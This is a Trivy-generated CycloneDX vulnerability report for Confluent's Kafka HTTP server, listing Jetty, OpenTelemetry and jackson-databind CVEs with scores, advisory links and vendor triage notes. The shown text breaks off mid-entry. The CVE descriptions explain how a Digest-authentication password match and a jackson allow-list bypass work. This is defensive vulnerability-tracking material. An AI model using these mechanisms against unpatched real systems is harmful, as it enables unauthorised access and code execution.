{
  "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json",
  "bomFormat": "CycloneDX",
  "specVersion": "1.6",
  "serialNumber": "urn:uuid:eb5297ee-3ad0-4e56-a67c-aa4e7cf8957b",
  "version": 1,
  "metadata": {
    "timestamp": "2026-08-20T01:06:07+00:00",
    "tools": {
      "components": [
        {
          "type": "application",
          "manufacturer": {
            "name": "Aqua Security Software Ltd."
          },
          "group": "aquasecurity",
          "name": "trivy",
          "version": "0.69.3"
        }
      ]
    },
    "component": {
      "bom-ref": "13250207-6633-49df-8a71-de056120fa99",
      "type": "application",
      "supplier": {
        "name": "Confluent"
      },
      "name": "confluent-ce-kafka-http-server",
      "version": "8.1.5-1",
      "properties": [
        {
          "name": "aquasecurity:trivy:SchemaVersion",
          "value": "2"
        }
      ]
    }
  },
  "components": [],
  "dependencies": [],
  "vulnerabilities": [
    {
      "id": "CVE-2026-10050",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 9.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        173,
        303
      ],
      "description": "In Eclipse Jetty, the Digest authentication server-side component uses ISO-8859-1 to encode the password as bytes.\n\n\n\nThis was done because the initial specification for HTTP did not specify explicitly a charset, and it was assumed to be ISO-8859-1 for historical reasons.\n\n\n\nIf the password contains characters that cannot be represented in ISO-8859-1, they are silently replaced by `?`. This happens with passwords that contain Chinese, Cyrillic or Greek characters, for example: `\u03b1\u03b2123` converts to `??123`.\n\n\n\nAn attacker can send a request with a digest `Authorization` header crafted with a password made of only `?` characters; the server would match any password of the same length that contains non-ISO-8859-1 characters.\n\n\n\nRecent HTTP Digest [RFC-7616](https://datatracker.ietf.org/doc/html/rfc7616) supports a `charset` parameters that defaults to UTF-8 that allows for correct encoding/decoding of passwords.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-security to version 9.4.63, 10.0.31, 11.0.31, 12.0.36, 12.1.10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-10050"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-10050"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/4bcdbc7db387ce9e20e2c7571a7250280466221d"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/d0bb829ccecbf19e3ad3d32f2649b2800f01222d"
        },
        {
          "url": "https://github.com/jetty/jetty.project/issues/15136"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15160"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15183"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.0.36"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.1.10"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-2fvj-hgj9-j2gr"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/work_items/120"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10050"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-10050"
        }
      ],
      "published": "2026-08-04T11:22:43+00:00",
      "updated": "2026-08-08T00:38:56+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-security@12.0.35",
          "versions": [
            {
              "version": "12.0.35",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-security@12.0.34",
          "versions": [
            {
              "version": "12.0.34",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#a65014fa-d1c2-41df-b0e2-9f8730a34713"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#cab260ab-3faf-48a2-853a-1c39081ff42c"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c9bf10e1-11d4-46bd-8189-2e8e3d04a14d"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#eb657e3a-67ae-469b-ba92-d11726cce6de"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.34"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/org.eclipse.jetty/jetty-security@12.0.35"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-10051",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        200
      ],
      "description": "In Eclipse Jetty, a first HTTP/1.1 request with trailers causes the server to retain the trailers in subsequent requests performed over the same connection.\nSubsequent request that do not have trailers report the trailers of the first request.\nSubsequent request that do have trailers report the union of trailers of the first request and the current request.",
      "recommendation": "Upgrade org.eclipse.jetty:jetty-server to version 12.0.36, 12.1.10",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-10051"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-10051"
        },
        {
          "url": "https://github.com/jetty/jetty.project"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/72206b3ea623cf7ed8729b47a83ee628ff10e8eb"
        },
        {
          "url": "https://github.com/jetty/jetty.project/commit/dc27e8d3ab743fe27935ea2d8c41756eb6c5bae9"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15162"
        },
        {
          "url": "https://github.com/jetty/jetty.project/pull/15163"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.0.36"
        },
        {
          "url": "https://github.com/jetty/jetty.project/releases/tag/jetty-12.1.10"
        },
        {
          "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-f4v5-65jj-pcr2"
        },
        {
          "url": "https://gitlab.eclipse.org/security/cve-assignment/-/work_items/119"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10051"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-10051"
        }
      ],
      "published": "2026-07-14T09:16:39+00:00",
      "updated": "2026-07-14T18:41:52+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.35",
          "versions": [
            {
              "version": "12.0.35",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.34",
          "versions": [
            {
              "version": "12.0.34",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ea66cf76-9f72-455d-9374-31b30add4427"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#9adaaaf0-9187-4c3b-b621-5234c27064c6"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#de582f91-c123-4a99-a314-8f95ddbc4e06"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#8c282f68-b96f-4a98-821b-63c91eee8561"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.34"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.35"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-45292",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "opentelemetry-java is the Java implementation of the OpenTelemetry API for recording telemetry, and SDK for managing telemetry recorded by the API. Prior to 1.62.0, a vulnerability affects the baggage propagation implementation in opentelemetry-api and opentelemetry-extension-trace-propagators. Parsing oversized baggage causes unbounded memory allocation and CPU consumption. Because baggage is automatically re-injected into every outgoing request, the effect can fan out to downstream services that never received the original malicious request. This vulnerability is fixed in 1.62.0.",
      "recommendation": "Upgrade io.opentelemetry:opentelemetry-api to version 1.62.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-45292"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28573"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36820"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41951"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43038"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-45292"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482785"
        },
        {
          "url": "https://github.com/open-telemetry/opentelemetry-java"
        },
        {
          "url": "https://github.com/open-telemetry/opentelemetry-java/commit/03837d3c1763bc35464aea1078671e2ef2336a5f"
        },
        {
          "url": "https://github.com/open-telemetry/opentelemetry-java/pull/8380"
        },
        {
          "url": "https://github.com/open-telemetry/opentelemetry-java/releases/tag/v1.62.0"
        },
        {
          "url": "https://github.com/open-telemetry/opentelemetry-java/security/advisories/GHSA-rcgg-9c38-7xpx"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45292"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-45292.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45292"
        }
      ],
      "published": "2026-05-28T17:16:32+00:00",
      "updated": "2026-08-17T12:18:43+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1",
          "versions": [
            {
              "version": "1.42.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#a72ebc66-3718-49af-a600-add50bb18f79"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        },
        {
          "ref": "urn:cdx:ff7345e2-0d0a-4bab-a534-ed295a416b98/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#67617c67-a43c-4fa4-9fe2-0c8e6e6a3732"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#1fbe5911-1c60-4874-839a-5e6893159668"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#bab9b86f-78b3-46bd-904c-4f6c2987984c"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#e9dfd76b-f92d-4090-b849-c149ae4b491d"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#7c5ea116-7270-45a0-bb56-744320d7f168"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/io.opentelemetry/opentelemetry-api@1.42.1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the OpenTelemetry W3C Baggage propagator is not wired to parse inbound request headers, so the unbounded baggage-allocation path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54512",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        184,
        502
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.10.0 until 2.18.8, 2.21.4, and 3.1.4, jackson-databind's PolymorphicTypeValidator (PTV) is the primary safety mechanism guarding polymorphic deserialization. When polymorphic typing is enabled and a type identifier contains generic parameters (i.e. the type ID string contains <), DatabindContext._resolveAndValidateGeneric() validates only the raw container class name (the substring before <) against the configured PTV. If the container type is approved, the method parses the full canonical type string via TypeFactory.constructFromCanonical() and returns the fully parameterized type without ever validating the nested type arguments against the PTV. The nested type arguments are then resolved, instantiated, and populated as beans during deserialization. An attacker who controls the type ID can therefore place a denied class as a generic type parameter of an allowed container \u2014 for example java.util.ArrayList<com.evil.Gadget> when only java.util.ArrayList is allow-listed. The container passes the PTV check; com.evil.Gadget is loaded via Class.forName(name, true, loader), instantiated, and its properties are set from attacker-controlled JSON. This completely bypasses an explicitly configured PTV allow-list. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 3.1.4, 2.21.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40895"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43400"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54512"
        },
        {
          "url": "https://bugzilla.redhat.com/2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492015"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492015"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54512"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54513"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-40895.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:43400"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/434d6c511de7fdd9872f29157aafb6162d12d8d5"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5988"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-j3rv-43j4-c7qm"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54512.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-43400.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54512"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54512"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-27T21:01:36+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ed39dfdb-395c-4d98-a3f6-f3bbae960502"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8a946054-d4de-4fae-be17-c8def7953482"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e272d2d7-ad51-44fe-ad2f-78acb7605ccc"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#e1daa1f8-3fbc-466d-bdfa-3606171f026b"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#27722e9c-480d-463c-9471-3e28fff661ce"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#d1a8375b-7e80-4a4b-9a19-e5181eec10bb"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#c2d8b33e-2a7c-4028-9a5f-d0a149bf6a68"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#91781c8e-7326-4ffd-aa21-e9a4bed6aa64"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f9bc8a73-638a-436a-b948-1b57cd1a3738"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#0df291d2-a463-48a8-8a00-212c73132383"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c59920ed-da76-4143-86fb-af4890d96240"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#fe3ca0fc-606d-4691-9791-677398b734ba"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3b2fc3d8-256a-4379-8c7a-46bfd2080520"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Confluent Platform does not deserialize untrusted JSON using class-based polymorphic typing; the only class-based sites are the Trogdor test tool (not in the deployed runtime) and the OAuth JwtIssuer selected by trusted broker configuration, so the PolymorphicTypeValidator bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54513",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        184
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.10.0 until 2.18.8, 2.21.4, and 3.1.4, BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray() allowlists any array type based only on clazz.isArray(), without validating the array's component (element) type against the configured allowlist. A PTV built with allowIfSubTypeIsArray() plus an explicit concrete-type allowlist therefore still permits EvilType[] even though EvilType is not allowlisted. When Jackson deserializes the elements and no per-element type IDs are present, it instantiates the component type directly with no further PTV check, bypassing the allowlist. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4, 3.1.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54513"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36839"
        },
